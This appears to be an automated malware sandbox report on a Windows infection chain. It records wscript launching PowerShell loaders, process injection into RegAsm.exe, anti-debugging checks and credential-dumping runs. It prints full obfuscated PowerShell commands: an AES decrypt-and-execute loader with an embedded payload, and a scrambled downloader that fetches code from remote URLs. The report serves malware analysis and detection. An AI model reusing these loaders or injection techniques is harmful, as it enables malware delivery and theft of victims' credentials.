                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_100010F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_10006580 FindFirstFileExA,4_2_10006580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040AE51 FindFirstFileW,FindNextFileW,7_2_0040AE51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,8_2_00407EF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,9_2_00407898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,4_2_00407C97
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00418981 memset,GetSystemInfo,7_2_00418981
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: powershell.exe, 0000000A.00000002.3373832812.0000000006BD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
                  Source: RegAsm.exe, 00000004.00000002.3268413511.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3265268792.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.2144857446.0000000005A7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2125342287.0000000005A7F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2127051789.0000000005A7F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2123291367.0000000005A7D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3352588129.0000000007C81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: wscript.exe, 00000005.00000003.2138407115.000000000331F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2125566333.0000000003306000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2141540834.0000000003323000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2141056632.0000000003306000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2138288688.000000000331A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2137941761.000000000330E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.2143677707.000000000332B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2124716308.00000000032CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2142018214.0000000003328000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2126019365.000000000332D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2137522930.0000000003307000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWhO
                  Source: RegAsm.exe, 00000004.00000002.3268413511.0000000000FC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                  Source: wscript.exe, 00000005.00000002.2143371503.00000000032F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: agerVirtual DiskHyper-V Guest Service InterfacevmicheartbeatHyper-V Data Exchange ServiceHyper-V Remote Desktop Virtualization ServicevmicshutdownHyper-V Time Synchronization ServiceHyper-V PowerShell Direct ServicevmicvssVolume Shadow CopyWindows TimeWalletServiceWarpJITSvcBlock Level Backup Engine ServiceWindows Biometric ServiceWindows Connection ManagerWindows Connect Now - Config RegistrarDiagnostic Service HostDiagnostic System HostMicrosoft Defender Antivirus Network Inspection ServiceWebClientWindows Event CollectorWindows Encryption Provider Host ServiceProblem Reports Control Panel SupportWindows Error Reporting ServiceWi-Fi Direct Services Connection Manager ServiceStill Image Acquisition EventsMicrosoft Defender Antivirus ServiceWinHTTP Web Proxy Auto-Discovery ServiceWindows Management InstrumentationWindows Remote Management (WS-Management)Windows Insider ServiceWLAN AutoConfigMicrosoft Account Sign-in AssistantLocal Profile Assistant ServiceWindows Management ServiceWMI Performance AdapterWindows Media Player Network Sharing ServiceWork FoldersParental ControlsPortable Device Enumerator ServiceWindows Push Notifications System ServiceSecurity CenterWindows SearchWindows UpdateWWAN AutoConfigXbox Live Auth ManagerXbox Live Game SaveXbox Accessory Management ServiceXbox Live Networking ServiceAgent Activation Runtime_27859GameDVR and Broadcast User Service_27859Bluetooth User Support Service_27859CaptureService_27859Clipboard User Service_27859Connected Devices Platform User Service_27859ConsentUX_27859CredentialEnrollmentManagerUserSvc_27859DeviceAssociationBroker_27859DevicePicker_27859DevicesFlow_27859MessagingService_27859Sync Host_27859Contact Data_27859PrintWorkflow_27859Udk User Service_27859User Data Storage_27859User Data Access_27859F
                  Source: wscript.exe, 00000005.00000002.2143238123.00000000032D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r-v guest service interfacevmicheartbeathyper-v data exchange servicehyper-v remote desktop virtualization servicevmicshutdownhyper-v time synchronization servicehyper-v powershell direct servicevmicvssvolume shadow copywindows timewalletservicewarpjitsvcblock level backup engine servicewindows biometric servicewindows connection managerwindows connect now - config registrardiagnostic service hostdiagnostic system hostmicrosoft defender antivirus network inspection servicewebclientwindows event collectorwindows encryption provider host serviceproblem reports control panel supportwindows error reporting servicewi-fi direct services connection manager servicestill image acquisition eventsmicrosoft defender antivirus servicewinhttp web proxy auto-discovery servicewindows management instrumentationwindows remote management (ws-management)windows insider servicewlan autoconfigmicrosoft account sign-in assistantlocal profile assistant servicewindows management servicewmi performance adapterwindows media player network sharing servicework foldersparental controlsportable device enumerator servicewindows push notifications system servicesecurity centerwindows searchwindows updatewwan autoconfigxbox live auth managerxbox live game savexbox accessory management servicexbox live networking serviceagent activation runtime_27859gamedvr and broadcast user service_27859bluetooth user support service_27859captureservice_27859clipboard user service_27859connected devices platform user service_27859consentux_27859credentialenrollmentmanagerusersvc_27859deviceassociationbroker_27859devicepicker_27859devicesflow_27859messagingservice_27859sync host_27859contact data_27859printworkflow_27859udk user service_27859user data storage_27859user data access_27859windows push notifications user service_27859^:
                  Source: wscript.exe, 00000000.00000003.1989416840.000001DA6153D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}SERTBO
                  Source: powershell.exe, 00000002.00000002.2167362177.000001B1E9A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: bhvCCC4.tmp.7.drBinary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_4-55334
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_004349F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,7_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,4_2_0041CB50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004432B5 mov eax, dword ptr fs:[00000030h]4_2_004432B5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_10004AB4 mov eax, dword ptr fs:[00000030h]4_2_10004AB4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00411CFE SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,4_2_00411CFE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_004349F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00434B47 SetUnhandledExceptionFilter,4_2_00434B47
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0043BB22
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00434FDC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_100060E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_10002639
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_10002B1C

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Yara detected Powershell decode and execute
                  Source: Yara matchFile source: amsi64_4432.amsi.csv, type: OTHER
                  Yara detected Powershell download and execute
                  Source: Yara matchFile source: amsi64_4432.amsi.csv, type: OTHER
                  Source: Yara matchFile source: amsi32_7244.amsi.csv, type: OTHER
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4432, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7244, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7632, type: MEMORYSTR
                  Contains functionality to inject code into remote processes
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,4_2_004180EF
                  Injects a PE file into a foreign processes
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                  Maps a DLL or memory area into another process
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B08008Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe4_2_004120F7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00419627 mouse_event,4_2_00419627
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrfptuyewdgikkwbbqnxbflydidjpkpem"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrfptuyewdgikkwbbqnxbflydidjpkpem"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jmlaun"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\tgqsvxbzg"Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo 